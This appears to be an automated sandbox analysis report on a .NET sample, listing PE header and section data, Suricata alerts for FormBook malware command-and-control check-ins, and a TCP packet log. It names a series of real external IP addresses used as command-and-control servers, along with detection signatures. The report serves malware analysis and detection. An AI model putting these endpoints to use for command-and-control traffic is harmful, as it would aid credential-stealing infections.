                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xbfcd80x4f.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc00000x388.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xc20000xc.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x20000xbdd300xbde005a7f74caabb49ce1e5a7cd9a2251fd2fFalse0.9638832599572087data7.988083531410528IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0xc00000x3880x4003bb51df22a7bee6a7d904d940086c8e6False0.37890625data2.8593527527777556IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0xc20000xc0x20064873d9808c60a4f48a2b8735d9de701False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_VERSION0xc00580x32cdata0.43472906403940886

                                                                                      Imports

                                                                                      DLLImport
                                                                                      mscoree.dll_CorExeMain

                                                                                      Network Behavior

                                                                                      Suricata IDS Alerts

                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-11-25T13:55:49.067574+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849714202.61.233.6680TCP
                                                                                      2024-11-25T13:55:49.067574+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849714202.61.233.6680TCP
                                                                                      2024-11-25T13:56:06.093405+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849716172.67.129.3880TCP
                                                                                      2024-11-25T13:56:08.805473+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849717172.67.129.3880TCP
                                                                                      2024-11-25T13:56:11.426007+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849718172.67.129.3880TCP
                                                                                      2024-11-25T13:56:14.280884+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849719172.67.129.3880TCP
                                                                                      2024-11-25T13:56:14.280884+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849719172.67.129.3880TCP
                                                                                      2024-11-25T13:56:21.198374+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849721209.74.77.10980TCP
                                                                                      2024-11-25T13:56:23.837299+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849723209.74.77.10980TCP
                                                                                      2024-11-25T13:56:26.511818+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849724209.74.77.10980TCP
                                                                                      2024-11-25T13:56:29.193972+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849725209.74.77.10980TCP
                                                                                      2024-11-25T13:56:29.193972+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849725209.74.77.10980TCP
                                                                                      2024-11-25T13:56:36.413440+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84972638.181.21.8580TCP
                                                                                      2024-11-25T13:56:39.085307+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84972738.181.21.8580TCP
                                                                                      2024-11-25T13:56:41.741523+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84972838.181.21.8580TCP
                                                                                      2024-11-25T13:56:44.481170+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84972938.181.21.8580TCP
                                                                                      2024-11-25T13:56:44.481170+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.84972938.181.21.8580TCP
                                                                                      2024-11-25T13:56:51.740869+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849730195.110.124.13380TCP
                                                                                      2024-11-25T13:56:54.624676+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849731195.110.124.13380TCP
                                                                                      2024-11-25T13:56:57.396791+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849732195.110.124.13380TCP
                                                                                      2024-11-25T13:56:59.969225+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849733195.110.124.13380TCP
                                                                                      2024-11-25T13:56:59.969225+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849733195.110.124.13380TCP
                                                                                      2024-11-25T13:57:08.291965+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849734163.44.185.18380TCP
                                                                                      2024-11-25T13:57:10.949462+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849735163.44.185.18380TCP
                                                                                      2024-11-25T13:57:13.611612+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849736163.44.185.18380TCP
                                                                                      2024-11-25T13:57:16.247743+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849737163.44.185.18380TCP
                                                                                      2024-11-25T13:57:16.247743+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849737163.44.185.18380TCP
                                                                                      2024-11-25T13:57:23.913704+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849738118.107.250.10380TCP
                                                                                      2024-11-25T13:57:26.649123+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849739118.107.250.10380TCP
                                                                                      2024-11-25T13:57:29.632280+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849740118.107.250.10380TCP
                                                                                      2024-11-25T13:57:32.410829+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849741118.107.250.10380TCP
                                                                                      2024-11-25T13:57:32.410829+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849741118.107.250.10380TCP
                                                                                      2024-11-25T13:57:39.176819+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84974213.248.169.4880TCP
                                                                                      2024-11-25T13:57:41.886045+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84974313.248.169.4880TCP
                                                                                      2024-11-25T13:57:44.614649+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84974413.248.169.4880TCP
                                                                                      2024-11-25T13:57:47.413211+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84974513.248.169.4880TCP
                                                                                      2024-11-25T13:57:47.413211+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.84974513.248.169.4880TCP
                                                                                      2024-11-25T13:57:54.210712+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84974684.32.84.3280TCP
                                                                                      2024-11-25T13:57:56.933477+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84974784.32.84.3280TCP
                                                                                      2024-11-25T13:57:59.559833+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84974884.32.84.3280TCP
                                                                                      2024-11-25T13:58:02.236284+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84974984.32.84.3280TCP
                                                                                      2024-11-25T13:58:02.236284+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.84974984.32.84.3280TCP
                                                                                      2024-11-25T13:58:09.382237+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849750104.21.24.19880TCP
                                                                                      2024-11-25T13:58:11.851475+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849751104.21.24.19880TCP
                                                                                      2024-11-25T13:58:14.725976+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849752104.21.24.19880TCP
                                                                                      2024-11-25T13:58:17.251012+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849753104.21.24.19880TCP
                                                                                      2024-11-25T13:58:17.251012+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849753104.21.24.19880TCP
                                                                                      2024-11-25T13:58:24.434110+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84975466.29.137.1080TCP
                                                                                      2024-11-25T13:58:27.003955+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84975566.29.137.1080TCP
                                                                                      2024-11-25T13:58:29.746107+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84975666.29.137.1080TCP
                                                                                      2024-11-25T13:58:32.464882+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84975766.29.137.1080TCP
                                                                                      2024-11-25T13:58:32.464882+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.84975766.29.137.1080TCP
                                                                                      2024-11-25T13:58:39.618490+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84975837.140.192.20680TCP
                                                                                      2024-11-25T13:58:42.163649+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84975937.140.192.20680TCP
                                                                                      2024-11-25T13:58:44.833531+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84976037.140.192.20680TCP
                                                                                      2024-11-25T13:58:47.503193+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.84976137.140.192.20680TCP
                                                                                      2024-11-25T13:58:47.503193+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.84976137.140.192.20680TCP
                                                                                      2024-11-25T13:58:55.373235+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849762199.59.243.22780TCP
                                                                                      2024-11-25T13:58:58.414028+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849763199.59.243.22780TCP
                                                                                      2024-11-25T13:59:00.945944+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849764199.59.243.22780TCP
                                                                                      2024-11-25T13:59:03.636767+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.849765199.59.243.22780TCP
                                                                                      2024-11-25T13:59:03.636767+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849765199.59.243.22780TCP
                                                                                      2024-11-25T13:59:12.161249+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849766194.58.112.17480TCP

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 25, 2024 13:55:47.673544884 CET4971480192.168.2.8202.61.233.66
                                                                                      Nov 25, 2024 13:55:47.793703079 CET8049714202.61.233.66192.168.2.8
                                                                                      Nov 25, 2024 13:55:47.793976068 CET4971480192.168.2.8202.61.233.66
                                                                                      Nov 25, 2024 13:55:47.803599119 CET4971480192.168.2.8202.61.233.66
                                                                                      Nov 25, 2024 13:55:47.923584938 CET8049714202.61.233.66192.168.2.8
                                                                                      Nov 25, 2024 13:55:49.066917896 CET8049714202.61.233.66192.168.2.8
                                                                                      Nov 25, 2024 13:55:49.067517042 CET8049714202.61.233.66192.168.2.8
                                                                                      Nov 25, 2024 13:55:49.067574024 CET4971480192.168.2.8202.61.233.66
                                                                                      Nov 25, 2024 13:55:49.071142912 CET4971480192.168.2.8202.61.233.66
                                                                                      Nov 25, 2024 13:55:49.191168070 CET8049714202.61.233.66192.168.2.8
                                                                                      Nov 25, 2024 13:56:04.642750025 CET4971680192.168.2.8172.67.129.38
                                                                                      Nov 25, 2024 13:56:04.763436079 CET8049716172.67.129.38192.168.2.8
                                                                                      Nov 25, 2024 13:56:04.763516903 CET4971680192.168.2.8172.67.129.38
                                                                                      Nov 25, 2024 13:56:04.779733896 CET4971680192.168.2.8172.67.129.38
                                                                                      Nov 25, 2024 13:56:04.923532963 CET8049716172.67.129.38192.168.2.8
                                                                                      Nov 25, 2024 13:56:06.092663050 CET8049716172.67.129.38192.168.2.8
                                                                                      Nov 25, 2024 13:56:06.093338966 CET8049716172.67.129.38192.168.2.8
                                                                                      Nov 25, 2024 13:56:06.093405008 CET4971680192.168.2.8172.67.129.38
                                                                                      Nov 25, 2024 13:56:06.288379908 CET4971680192.168.2.8172.67.129.38
                                                                                      Nov 25, 2024 13:56:07.307296038 CET4971780192.168.2.8172.67.129.38
                                                                                      Nov 25, 2024 13:56:07.427702904 CET8049717172.67.129.38192.168.2.8
                                                                                      Nov 25, 2024 13:56:07.427817106 CET4971780192.168.2.8172.67.129.38
                                                                                      Nov 25, 2024 13:56:07.445298910 CET4971780192.168.2.8172.67.129.38
                                                                                      Nov 25, 2024 13:56:07.565319061 CET8049717172.67.129.38192.168.2.8
                                                                                      Nov 25, 2024 13:56:08.804627895 CET8049717172.67.129.38192.168.2.8
                                                                                      Nov 25, 2024 13:56:08.805407047 CET8049717172.67.129.38192.168.2.8
                                                                                      Nov 25, 2024 13:56:08.805473089 CET4971780192.168.2.8172.67.129.38
                                                                                      Nov 25, 2024 13:56:08.960294008 CET4971780192.168.2.8172.67.129.38
                                                                                      Nov 25, 2024 13:56:09.981663942 CET4971880192.168.2.8172.67.129.38
                                                                                      Nov 25, 2024 13:56:10.101963997 CET8049718172.67.129.38192.168.2.8
                                                                                      Nov 25, 2024 13:56:10.102045059 CET4971880192.168.2.8172.67.129.38
                                                                                      Nov 25, 2024 13:56:10.120735884 CET4971880192.168.2.8172.67.129.38
                                                                                      Nov 25, 2024 13:56:10.242856026 CET8049718172.67.129.38192.168.2.8
                                                                                      Nov 25, 2024 13:56:10.242961884 CET8049718172.67.129.38192.168.2.8
                                                                                      Nov 25, 2024 13:56:11.425204992 CET8049718172.67.129.38192.168.2.8
                                                                                      Nov 25, 2024 13:56:11.425954103 CET8049718172.67.129.38192.168.2.8
                                                                                      Nov 25, 2024 13:56:11.426007032 CET4971880192.168.2.8172.67.129.38
                                                                                      Nov 25, 2024 13:56:11.426048040 CET8049718172.67.129.38192.168.2.8
                                                                                      Nov 25, 2024 13:56:11.426093102 CET4971880192.168.2.8172.67.129.38
                                                                                      Nov 25, 2024 13:56:11.632051945 CET4971880192.168.2.8172.67.129.38
                                                                                      Nov 25, 2024 13:56:12.681518078 CET4971980192.168.2.8172.67.129.38
                                                                                      Nov 25, 2024 13:56:12.801589012 CET8049719172.67.129.38192.168.2.8
                                                                                      Nov 25, 2024 13:56:12.801657915 CET4971980192.168.2.8172.67.129.38
                                                                                      Nov 25, 2024 13:56:12.810961962 CET4971980192.168.2.8172.67.129.38
                                                                                      Nov 25, 2024 13:56:12.930999994 CET8049719172.67.129.38192.168.2.8
                                                                                      Nov 25, 2024 13:56:14.280613899 CET8049719172.67.129.38192.168.2.8
                                                                                      Nov 25, 2024 13:56:14.280642986 CET8049719172.67.129.38192.168.2.8
                                                                                      Nov 25, 2024 13:56:14.280654907 CET8049719172.67.129.38192.168.2.8
                                                                                      Nov 25, 2024 13:56:14.280884027 CET4971980192.168.2.8172.67.129.38
                                                                                      Nov 25, 2024 13:56:14.284311056 CET4971980192.168.2.8172.67.129.38
                                                                                      Nov 25, 2024 13:56:14.377598047 CET8049719172.67.129.38192.168.2.8
                                                                                      Nov 25, 2024 13:56:14.380470037 CET4971980192.168.2.8172.67.129.38
                                                                                      Nov 25, 2024 13:56:14.404213905 CET8049719172.67.129.38192.168.2.8
                                                                                      Nov 25, 2024 13:56:19.775177956 CET4972180192.168.2.8209.74.77.109
                                                                                      Nov 25, 2024 13:56:19.895476103 CET8049721209.74.77.109192.168.2.8
                                                                                      Nov 25, 2024 13:56:19.897756100 CET4972180192.168.2.8209.74.77.109
                                                                                      Nov 25, 2024 13:56:19.923913956 CET4972180192.168.2.8209.74.77.109
                                                                                      Nov 25, 2024 13:56:20.045938015 CET8049721209.74.77.109192.168.2.8
                                                                                      Nov 25, 2024 13:56:21.198311090 CET8049721209.74.77.109192.168.2.8
                                                                                      Nov 25, 2024 13:56:21.198326111 CET8049721209.74.77.109192.168.2.8
                                                                                      Nov 25, 2024 13:56:21.198374033 CET4972180192.168.2.8209.74.77.109
                                                                                      Nov 25, 2024 13:56:21.429220915 CET4972180192.168.2.8209.74.77.109
                                                                                      Nov 25, 2024 13:56:22.447516918 CET4972380192.168.2.8209.74.77.109
                                                                                      Nov 25, 2024 13:56:22.568821907 CET8049723209.74.77.109192.168.2.8
                                                                                      Nov 25, 2024 13:56:22.569199085 CET4972380192.168.2.8209.74.77.109
                                                                                      Nov 25, 2024 13:56:22.584954023 CET4972380192.168.2.8209.74.77.109
                                                                                      Nov 25, 2024 13:56:22.704951048 CET8049723209.74.77.109192.168.2.8
                                                                                      Nov 25, 2024 13:56:23.837104082 CET8049723209.74.77.109192.168.2.8
                                                                                      Nov 25, 2024 13:56:23.837141037 CET8049723209.74.77.109192.168.2.8
                                                                                      Nov 25, 2024 13:56:23.837299109 CET4972380192.168.2.8209.74.77.109
                                                                                      Nov 25, 2024 13:56:24.100919008 CET4972380192.168.2.8209.74.77.109
                                                                                      Nov 25, 2024 13:56:25.119961023 CET4972480192.168.2.8209.74.77.109
                                                                                      Nov 25, 2024 13:56:25.240036011 CET8049724209.74.77.109192.168.2.8
                                                                                      Nov 25, 2024 13:56:25.240217924 CET4972480192.168.2.8209.74.77.109
                                                                                      Nov 25, 2024 13:56:25.255928993 CET4972480192.168.2.8209.74.77.109
                                                                                      Nov 25, 2024 13:56:25.375977039 CET8049724209.74.77.109192.168.2.8
                                                                                      Nov 25, 2024 13:56:25.376003981 CET8049724209.74.77.109192.168.2.8
                                                                                      Nov 25, 2024 13:56:26.511651039 CET8049724209.74.77.109192.168.2.8
                                                                                      Nov 25, 2024 13:56:26.511769056 CET8049724209.74.77.109192.168.2.8
                                                                                      Nov 25, 2024 13:56:26.511817932 CET4972480192.168.2.8209.74.77.109
                                                                                      Nov 25, 2024 13:56:26.758800030 CET4972480192.168.2.8209.74.77.109
                                                                                      Nov 25, 2024 13:56:27.778287888 CET4972580192.168.2.8209.74.77.109
                                                                                      Nov 25, 2024 13:56:27.902710915 CET8049725209.74.77.109192.168.2.8
                                                                                      Nov 25, 2024 13:56:27.903517008 CET4972580192.168.2.8209.74.77.109
                                                                                      Nov 25, 2024 13:56:27.913479090 CET4972580192.168.2.8209.74.77.109
                                                                                      Nov 25, 2024 13:56:28.035378933 CET8049725209.74.77.109192.168.2.8
                                                                                      Nov 25, 2024 13:56:29.193669081 CET8049725209.74.77.109192.168.2.8
                                                                                      Nov 25, 2024 13:56:29.193722963 CET8049725209.74.77.109192.168.2.8
                                                                                      Nov 25, 2024 13:56:29.193972111 CET4972580192.168.2.8209.74.77.109
                                                                                      Nov 25, 2024 13:56:29.197601080 CET4972580192.168.2.8209.74.77.109
                                                                                      Nov 25, 2024 13:56:29.317956924 CET8049725209.74.77.109192.168.2.8
                                                                                      Nov 25, 2024 13:56:34.761370897 CET4972680192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:34.882855892 CET804972638.181.21.85192.168.2.8
                                                                                      Nov 25, 2024 13:56:34.882966995 CET4972680192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:34.899224043 CET4972680192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:35.019792080 CET804972638.181.21.85192.168.2.8
                                                                                      Nov 25, 2024 13:56:36.413439989 CET4972680192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:36.455631018 CET804972638.181.21.85192.168.2.8
                                                                                      Nov 25, 2024 13:56:36.455698967 CET4972680192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:36.455760002 CET804972638.181.21.85192.168.2.8
                                                                                      Nov 25, 2024 13:56:36.455806971 CET4972680192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:36.533324003 CET804972638.181.21.85192.168.2.8
                                                                                      Nov 25, 2024 13:56:36.533399105 CET4972680192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:37.432517052 CET4972780192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:37.554847956 CET804972738.181.21.85192.168.2.8
                                                                                      Nov 25, 2024 13:56:37.554940939 CET4972780192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:37.575434923 CET4972780192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:37.696551085 CET804972738.181.21.85192.168.2.8
                                                                                      Nov 25, 2024 13:56:39.085306883 CET4972780192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:39.205678940 CET804972738.181.21.85192.168.2.8
                                                                                      Nov 25, 2024 13:56:39.205928087 CET4972780192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:40.104154110 CET4972880192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:40.224443913 CET804972838.181.21.85192.168.2.8
                                                                                      Nov 25, 2024 13:56:40.224582911 CET4972880192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:40.239509106 CET4972880192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:40.359687090 CET804972838.181.21.85192.168.2.8
                                                                                      Nov 25, 2024 13:56:40.359750986 CET804972838.181.21.85192.168.2.8
                                                                                      Nov 25, 2024 13:56:41.741523027 CET4972880192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:41.800571918 CET804972838.181.21.85192.168.2.8
                                                                                      Nov 25, 2024 13:56:41.800661087 CET804972838.181.21.85192.168.2.8
                                                                                      Nov 25, 2024 13:56:41.800703049 CET4972880192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:41.800740004 CET4972880192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:41.861577988 CET804972838.181.21.85192.168.2.8
                                                                                      Nov 25, 2024 13:56:41.862440109 CET4972880192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:42.761164904 CET4972980192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:42.881443024 CET804972938.181.21.85192.168.2.8
                                                                                      Nov 25, 2024 13:56:42.881552935 CET4972980192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:42.892083883 CET4972980192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:43.012507915 CET804972938.181.21.85192.168.2.8
                                                                                      Nov 25, 2024 13:56:44.480930090 CET804972938.181.21.85192.168.2.8
                                                                                      Nov 25, 2024 13:56:44.481034994 CET804972938.181.21.85192.168.2.8
                                                                                      Nov 25, 2024 13:56:44.481169939 CET4972980192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:44.484239101 CET4972980192.168.2.838.181.21.85
                                                                                      Nov 25, 2024 13:56:44.604887962 CET804972938.181.21.85192.168.2.8
                                                                                      Nov 25, 2024 13:56:50.308983088 CET4973080192.168.2.8195.110.124.133
                                                                                      Nov 25, 2024 13:56:50.429090977 CET8049730195.110.124.133192.168.2.8
                                                                                      Nov 25, 2024 13:56:50.429192066 CET4973080192.168.2.8195.110.124.133
                                                                                      Nov 25, 2024 13:56:50.475522995 CET4973080192.168.2.8195.110.124.133
                                                                                      Nov 25, 2024 13:56:50.595761061 CET8049730195.110.124.133192.168.2.8
                                                                                      Nov 25, 2024 13:56:51.740436077 CET8049730195.110.124.133192.168.2.8
                                                                                      Nov 25, 2024 13:56:51.740775108 CET8049730195.110.124.133192.168.2.8
                                                                                      Nov 25, 2024 13:56:51.740869045 CET4973080192.168.2.8195.110.124.133
                                                                                      Nov 25, 2024 13:56:51.991494894 CET4973080192.168.2.8195.110.124.133
                                                                                      Nov 25, 2024 13:56:53.141195059 CET4973180192.168.2.8195.110.124.133
                                                                                      Nov 25, 2024 13:56:53.261418104 CET8049731195.110.124.133192.168.2.8
                                                                                      Nov 25, 2024 13:56:53.261643887 CET4973180192.168.2.8195.110.124.133
                                                                                      Nov 25, 2024 13:56:53.280829906 CET4973180192.168.2.8195.110.124.133
                                                                                      Nov 25, 2024 13:56:53.400990963 CET8049731195.110.124.133192.168.2.8
                                                                                      Nov 25, 2024 13:56:54.623528004 CET8049731195.110.124.133192.168.2.8
                                                                                      Nov 25, 2024 13:56:54.624603987 CET8049731195.110.124.133192.168.2.8
                                                                                      Nov 25, 2024 13:56:54.624675989 CET4973180192.168.2.8195.110.124.133
                                                                                      Nov 25, 2024 13:56:54.789472103 CET4973180192.168.2.8195.110.124.133
                                                                                      Nov 25, 2024 13:56:55.807804108 CET4973280192.168.2.8195.110.124.133
                                                                                      Nov 25, 2024 13:56:55.929030895 CET8049732195.110.124.133192.168.2.8
                                                                                      Nov 25, 2024 13:56:55.929102898 CET4973280192.168.2.8195.110.124.133
                                                                                      Nov 25, 2024 13:56:55.947637081 CET4973280192.168.2.8195.110.124.133
                                                                                      Nov 25, 2024 13:56:56.067939997 CET8049732195.110.124.133192.168.2.8
                                                                                      Nov 25, 2024 13:56:56.067955971 CET8049732195.110.124.133192.168.2.8
                                                                                      Nov 25, 2024 13:56:57.394995928 CET8049732195.110.124.133192.168.2.8
                                                                                      Nov 25, 2024 13:56:57.395111084 CET8049732195.110.124.133192.168.2.8
                                                                                      Nov 25, 2024 13:56:57.396790981 CET4973280192.168.2.8195.110.124.133
                                                                                      Nov 25, 2024 13:56:57.460292101 CET4973280192.168.2.8195.110.124.133
                                                                                      Nov 25, 2024 13:56:58.480310917 CET4973380192.168.2.8195.110.124.133
                                                                                      Nov 25, 2024 13:56:58.600605011 CET8049733195.110.124.133192.168.2.8
                                                                                      Nov 25, 2024 13:56:58.600863934 CET4973380192.168.2.8195.110.124.133
                                                                                      Nov 25, 2024 13:56:58.612987995 CET4973380192.168.2.8195.110.124.133
                                                                                      Nov 25, 2024 13:56:58.733000994 CET8049733195.110.124.133192.168.2.8
                                                                                      Nov 25, 2024 13:56:59.968991041 CET8049733195.110.124.133192.168.2.8
                                                                                      Nov 25, 2024 13:56:59.969145060 CET8049733195.110.124.133192.168.2.8
                                                                                      Nov 25, 2024 13:56:59.969224930 CET4973380192.168.2.8195.110.124.133
                                                                                      Nov 25, 2024 13:56:59.972170115 CET4973380192.168.2.8195.110.124.133
                                                                                      Nov 25, 2024 13:57:00.092396021 CET8049733195.110.124.133192.168.2.8
                                                                                      Nov 25, 2024 13:57:06.672332048 CET4973480192.168.2.8163.44.185.183
                                                                                      Nov 25, 2024 13:57:06.794439077 CET8049734163.44.185.183192.168.2.8
                                                                                      Nov 25, 2024 13:57:06.794534922 CET4973480192.168.2.8163.44.185.183
                                                                                      Nov 25, 2024 13:57:06.812588930 CET4973480192.168.2.8163.44.185.183
                                                                                      Nov 25, 2024 13:57:06.933708906 CET8049734163.44.185.183192.168.2.8
                                                                                      Nov 25, 2024 13:57:08.291812897 CET8049734163.44.185.183192.168.2.8
                                                                                      Nov 25, 2024 13:57:08.291855097 CET8049734163.44.185.183192.168.2.8
                                                                                      Nov 25, 2024 13:57:08.291867971 CET8049734163.44.185.183192.168.2.8
                                                                                      Nov 25, 2024 13:57:08.291924953 CET8049734163.44.185.183192.168.2.8
